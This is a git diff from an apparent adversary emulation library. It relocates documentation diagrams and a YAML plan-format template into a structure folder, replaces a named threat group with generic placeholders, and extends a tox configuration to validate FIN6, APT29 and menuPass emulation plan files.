-![](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/structural-documentation/notional_diagram_phases.PNG)
+![/structure/notional_diagram.PNG](/structure/notional_diagram_phases.PNG)
 
 In this case, the second Phase has two alternative Step options (*Steal Data* or *Destroy Data*) and creates two distinct Scenarios.
diff --git a/format_dictionary.yaml b/structure/format_dictionary.yaml
similarity index 91%
rename from format_dictionary.yaml
rename to structure/format_dictionary.yaml
index b2dd438f..6e487181 100644
--- a/format_dictionary.yaml
+++ b/structure/format_dictionary.yaml
@@ -2,8 +2,8 @@
 
 - emulation_plan_details:
     id: UUID for the Procedure (e.g. b5192070-dff1-4134-bf66-c6b87c7498af)
-    adversary_name: menuPass
-    adversary_description: menuPass is thought to be a Chinese cyber espionage group associated with activity directed by elements of the PRC MSS.
+    adversary_name: Adversary
+    adversary_description: Adversary Description
     attack_version: Version of ATT&CK in which the plan was developed
     format_version: YAML format version
 
@@ -21,12 +21,12 @@
   cti_source: Reference (link, description, etc.) to a specific CTI data source such as a threat report or file
   procedure_group: A unique name for a group of Procedures
   procedure_step: A unique step ID for this TTP. Can be used to create sequences of TTPs.
-  platforms: #(Empty) 
+  platforms: #(Empty)
     platform_name: #(Empty/Variable e.g. windows, linux, darwin)
       executor_name: #(Empty/Variable e.g. cmd, psh, pwsh, sh)
         command: |
           The command or data to provide to that executor
-        payloads: 
+        payloads:
         - The name of a file to use as a payload for the executor
 
   # Multiple input arguments may be specified and referenced elsewhere using the format #{argument_name}
@@ -42,7 +42,7 @@
   - description: Description of the dependency command
     prereq_command: A validation command to execute as a prerequisite to this Procedure that checks that all dependencies are met
     get_prereq_command: A command that ensures all payloads and arguments are available before executing the validation command
-  
+
   # Additional execution methods for the Procedure may be provided through executors
   # Multiple executors may be specified
   executors:
diff --git a/notional_diagram.PNG b/structure/notional_diagram.PNG
similarity index 100%
rename from notional_diagram.PNG
rename to structure/notional_diagram.PNG
diff --git a/notional_diagram_loops.PNG b/structure/notional_diagram_loops.PNG
similarity index 100%
rename from notional_diagram_loops.PNG
rename to structure/notional_diagram_loops.PNG
diff --git a/notional_diagram_phases.PNG b/structure/notional_diagram_phases.PNG
similarity index 100%
rename from notional_diagram_phases.PNG
rename to structure/notional_diagram_phases.PNG
diff --git a/tox.ini b/tox.ini
index 853c8f32..a6bc07af 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,5 +1,5 @@
 [tox]
-envlist = fin6
+envlist = emu_lib
 skipsdist = True
 
 [testenv]
@@ -7,10 +7,12 @@ deps =
     jsonschema
     ruamel.yaml
 
-[testenv:fin6]
+[testenv:emu_lib]
 commands =
-    python resources/plan_validator.py fin6/Emulation_Plan/FIN6.yaml -schema_document resources/format_schema.json
+    python resources/plan_validator.py fin6/Emulation_Plan/yaml/FIN6.yaml -schema_document resources/format_schema.json
+    python resources/plan_validator.py apt29/Emulation_Plan/yaml/APT29.yaml -schema_document resources/format_schema.json
+    python resources/plan_validator.py menuPass/Emulation_Plan/yaml/menupass.yaml -schema_document resources/format_schema.json
 
 [travis]
 python =
-  3.8: fin6
+  3.8: emu_lib